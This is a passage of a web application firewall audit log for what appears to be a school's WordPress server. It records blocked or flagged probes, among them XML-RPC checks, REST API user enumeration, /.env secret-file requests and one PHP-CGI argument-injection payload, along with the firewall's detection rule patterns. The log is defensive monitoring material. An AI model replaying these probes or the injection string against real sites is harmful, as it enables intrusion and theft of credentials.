/xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.167.153 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.167.153 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --cdd0f53a-C-- demo.sayHello --cdd0f53a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --cdd0f53a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746913403372980 5719 (- - -) Stopwatch2: 1746913403372980 5719; combined=4249, p1=646, p2=3379, p3=30, p4=34, p5=94, sr=185, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cdd0f53a-Z-- --b182ab2b-A-- [11/May/2025:04:47:27 +0700] aB_Jb0EuxCpmyy5aJPlpTQAAAAU 103.236.140.4 43618 103.236.140.4 8181 --b182ab2b-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 4.188.112.137 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 4.188.112.137 X-Forwarded-Proto: https Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --b182ab2b-C-- --b182ab2b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b182ab2b-E-- --b182ab2b-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746913647246898 5024 (- - -) Stopwatch2: 1746913647246898 5024; combined=3282, p1=537, p2=2712, p3=0, p4=0, p5=33, sr=76, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b182ab2b-Z-- --5dbbaf01-A-- [11/May/2025:04:56:46 +0700] aB_Lnubs1CLLACKj-_zGywAAAJY 103.236.140.4 33744 103.236.140.4 8181 --5dbbaf01-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.163.124 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.163.124 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --5dbbaf01-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5dbbaf01-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746914206943901 15152 (- - -) Stopwatch2: 1746914206943901 15152; combined=25634, p1=426, p2=820, p3=0, p4=0, p5=12212, sr=73, sw=0, l=0, gc=12176 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5dbbaf01-Z-- --2bf20112-A-- [11/May/2025:04:56:53 +0700] aB_LpU8xOExV7lPH_Dl2mwAAANM 103.236.140.4 33940 103.236.140.4 8181 --2bf20112-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.163.124 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.163.124 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --2bf20112-C-- demo.sayHello --2bf20112-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --2bf20112-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746914213299771 7435 (- - -) Stopwatch2: 1746914213299771 7435; combined=5650, p1=564, p2=4825, p3=29, p4=40, p5=113, sr=66, sw=79, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2bf20112-Z-- --209ce874-A-- [11/May/2025:05:23:10 +0700] aB_Rzk8xOExV7lPH_DmC2QAAAMs 103.236.140.4 52912 103.236.140.4 8181 --209ce874-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 142.93.41.165 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 142.93.41.165 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --209ce874-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --209ce874-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746915790738330 749 (- - -) Stopwatch2: 1746915790738330 749; combined=314, p1=274, p2=0, p3=0, p4=0, p5=40, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --209ce874-Z-- --b7367c72-A-- [11/May/2025:05:35:11 +0700] aB_Un-bs1CLLACKj-_zVzwAAAJc 103.236.140.4 46240 103.236.140.4 8181 --b7367c72-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.91.79 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.91.79 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b7367c72-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b7367c72-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746916511347811 5135 (- - -) Stopwatch2: 1746916511347811 5135; combined=2150, p1=535, p2=1574, p3=0, p4=0, p5=41, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b7367c72-Z-- --f4059a5c-A-- [11/May/2025:05:35:23 +0700] aB_Uqwpy530QiWmSS61H8wAAAEo 103.236.140.4 46640 103.236.140.4 8181 --f4059a5c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.91.79 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.91.79 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --f4059a5c-C-- demo.sayHello --f4059a5c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --f4059a5c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746916523877055 5371 (- - -) Stopwatch2: 1746916523877055 5371; combined=4088, p1=518, p2=3365, p3=33, p4=32, p5=84, sr=64, sw=56, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f4059a5c-Z-- --9ac10648-A-- [11/May/2025:05:52:49 +0700] aB_YwUEuxCpmyy5aJPmLsAAAABQ 103.236.140.4 53682 103.236.140.4 8181 --9ac10648-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.61.250 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.61.250 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --9ac10648-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9ac10648-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746917569754084 2725 (- - -) Stopwatch2: 1746917569754084 2725; combined=1305, p1=430, p2=849, p3=0, p4=0, p5=26, sr=101, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9ac10648-Z-- --14fc7545-A-- [11/May/2025:05:52:56 +0700] aB_YyE8xOExV7lPH_DmQAAAAANc 103.236.140.4 53906 103.236.140.4 8181 --14fc7545-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.61.250 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.61.250 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --14fc7545-C-- demo.sayHello --14fc7545-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --14fc7545-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746917576889851 6602 (- - -) Stopwatch2: 1746917576889851 6602; combined=5262, p1=661, p2=4390, p3=41, p4=44, p5=78, sr=77, sw=48, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --14fc7545-Z-- --7433a862-A-- [11/May/2025:05:56:54 +0700] aB_Ztgpy530QiWmSS61SpQAAAEs 103.236.140.4 33176 103.236.140.4 8181 --7433a862-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.180.151 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.180.151 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --7433a862-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7433a862-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746917814435180 2889 (- - -) Stopwatch2: 1746917814435180 2889; combined=1579, p1=516, p2=1034, p3=0, p4=0, p5=29, sr=116, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7433a862-Z-- --0427ad11-A-- [11/May/2025:05:57:02 +0700] aB_ZvkEuxCpmyy5aJPmODQAAABg 103.236.140.4 33392 103.236.140.4 8181 --0427ad11-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.180.151 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.180.151 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --0427ad11-C-- demo.sayHello --0427ad11-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --0427ad11-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746917822225747 4583 (- - -) Stopwatch2: 1746917822225747 4583; combined=3362, p1=450, p2=2718, p3=28, p4=27, p5=80, sr=81, sw=59, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0427ad11-Z-- --d02f552f-A-- [11/May/2025:06:37:10 +0700] aB_jJubs1CLLACKj-_zwswAAAIw 103.236.140.4 53054 103.236.140.4 8181 --d02f552f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.178.209 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.178.209 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --d02f552f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d02f552f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746920230871209 2404 (- - -) Stopwatch2: 1746920230871209 2404; combined=1236, p1=388, p2=819, p3=0, p4=0, p5=29, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d02f552f-Z-- --5c6a8b2b-A-- [11/May/2025:06:37:18 +0700] aB_jLkEuxCpmyy5aJPmj5AAAAAE 103.236.140.4 53310 103.236.140.4 8181 --5c6a8b2b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.178.209 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.178.209 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --5c6a8b2b-C-- demo.sayHello --5c6a8b2b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --5c6a8b2b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746920238046532 5445 (- - -) Stopwatch2: 1746920238046532 5445; combined=4338, p1=542, p2=3570, p3=35, p4=35, p5=92, sr=71, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5c6a8b2b-Z-- --9fbb3e35-A-- [11/May/2025:06:39:01 +0700] aB_jlebs1CLLACKj-_zxXgAAAJE 103.236.140.4 56894 103.236.140.4 8181 --9fbb3e35-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.46.211 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.46.211 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --9fbb3e35-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9fbb3e35-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746920341000303 3315 (- - -) Stopwatch2: 1746920341000303 3315; combined=1473, p1=498, p2=945, p3=0, p4=0, p5=30, sr=118, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9fbb3e35-Z-- --1e09ca2c-A-- [11/May/2025:06:39:08 +0700] aB_jnE8xOExV7lPH_DmkUQAAAM4 103.236.140.4 57154 103.236.140.4 8181 --1e09ca2c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.46.211 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.46.211 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --1e09ca2c-C-- demo.sayHello --1e09ca2c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --1e09ca2c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746920348006794 6537 (- - -) Stopwatch2: 1746920348006794 6537; combined=4818, p1=590, p2=4005, p3=32, p4=35, p5=94, sr=74, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1e09ca2c-Z-- --d475f540-A-- [11/May/2025:07:02:47 +0700] aB_pJ0EuxCpmyy5aJPmzGAAAABc 103.236.140.4 47150 103.236.140.4 8181 --d475f540-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.70.87 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.70.87 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; U; Android 1.6; es-es; SonyEricssonX10i Build/R1FA016) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 Accept-Charset: utf-8 --d475f540-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d475f540-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746921767155012 932 (- - -) Stopwatch2: 1746921767155012 932; combined=450, p1=406, p2=0, p3=0, p4=0, p5=44, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d475f540-Z-- --ed6bf007-A-- [11/May/2025:07:11:41 +0700] aB_rPU8xOExV7lPH_DmyKQAAAM4 103.236.140.4 36792 103.236.140.4 8181 --ed6bf007-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 195.211.191.76 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 195.211.191.76 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows; U; Windows CE 5.1; rv:1.8.1a3) Gecko/20060610 Minimo/0.016 Accept-Charset: utf-8 --ed6bf007-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ed6bf007-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746922301781281 762 (- - -) Stopwatch2: 1746922301781281 762; combined=320, p1=283, p2=0, p3=0, p4=0, p5=37, sr=62, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ed6bf007-Z-- --89985f65-A-- [11/May/2025:07:25:23 +0700] aB_uc0EuxCpmyy5aJPnA_QAAAAI 103.236.140.4 38052 103.236.140.4 8181 --89985f65-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.87.101 X-Forwarded-Host: 